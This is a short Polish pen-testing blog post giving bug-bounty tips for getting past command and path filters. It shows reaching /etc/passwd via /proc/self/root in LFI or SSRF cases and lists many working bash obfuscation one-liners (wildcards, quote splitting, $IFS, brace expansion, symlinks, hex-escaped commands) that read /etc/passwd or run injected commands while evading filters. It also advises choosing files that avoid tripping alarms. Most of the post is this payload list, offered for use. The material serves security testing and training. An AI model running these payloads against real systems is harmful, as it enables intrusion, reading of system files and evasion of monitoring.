NFsec Logo

1001 Pen Test oraz Bug Bounty Tips & Tricks #1 – Omijanie filtrów poleceń

26/03/2019 w Pen Test Brak komentarzy.  (artykuł nr 687, ilość słów: 194)

J

eśli znaleźliśmy podatność LFI lub SSRF i chcemy odczytać plik /etc/passwd, ale serwer filtruje wszystko, co zaczyna się od /etc możemy spróbować zrobić to za pomocą wirtualnego systemu plików proc, czyli: /proc/self/root/etc/passwd (chcąć pominąć filtry, aby nie wyzwolić ustawionych alarmów lepiej unikać frazy /etc/passwd i wykorzystać np. plik: /proc/self/root/etc/timezone lub inny). Natomiast, jeśli polecenie jest wykonywane w kontekście powłoki bash możemy wykorzystać obfuskację (ang. obfuscation), czyli zaciemnienie, które i tak zostanie zinterpretowane przez powłokę:

/bin/cat /proc/../etc/./passwd
/bin/cat //etc//passwd
/bin/cat ///etc///passwd
/bin/cat /mnt/././../etc/././passwd
/bin/cat /etc/.\/\/\/\/\/passwd
/bin/cat /etc/.\/.\/.\/.\/passwd
/bin/cat /et*/pa**wd
/bin/cat /\e\t\c/passwd
/bin/cat /et$'c/pa\u0000/notexist/path'sswd
/bin/cat $(echo /e)tc$(echo /pa*)wd
/b'i'n/c'a't /e't'c/p'a's's'w'd'
/b"i"n/c"a"t /e"t"c/p"a"s"s"w"d"
/???/?at /???/????w?
/bin/c$@at /etc/passwd
ln -s / slash; head -n 2 slash////../etc/passwd
ln -s / slash; head -n 2 `readlink slash`etc`readlink slash`passwd
test=/ehhh/hmtc/pahhh/hmsswd; cat ${test//hhh\/hm/}; cat ${test//hh??hm/}
echo /*/*ss*

Polecenia w jednym ciągu bez spacji:

/bin/cat</etc/passwd
{/bin/cat,/etc/passwd}
/bin/cat$IFS/etc/passwd
echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
X=$'uname\x20-a'&&$X
IFS=,;`cat<<<uname,-a`

25 grudnia 1998 roku (prawie 21 lat temu) rain.forest.puppy omówił obydwa ataki SQL Injection („ODBC and MS SQL server 6.5”) oraz SSRF („Proxy Problems”) w 54’tym wydaniu magazynu Phrack.

Więcej informacji: Sven Morgenroth, Mohammed Aldoub, Malwrologist

Kategorie K a t e g o r i e : Pen Test

Tagi T a g i : , , , , , , , , ,

Komentowanie tego wpisu jest zablokowane.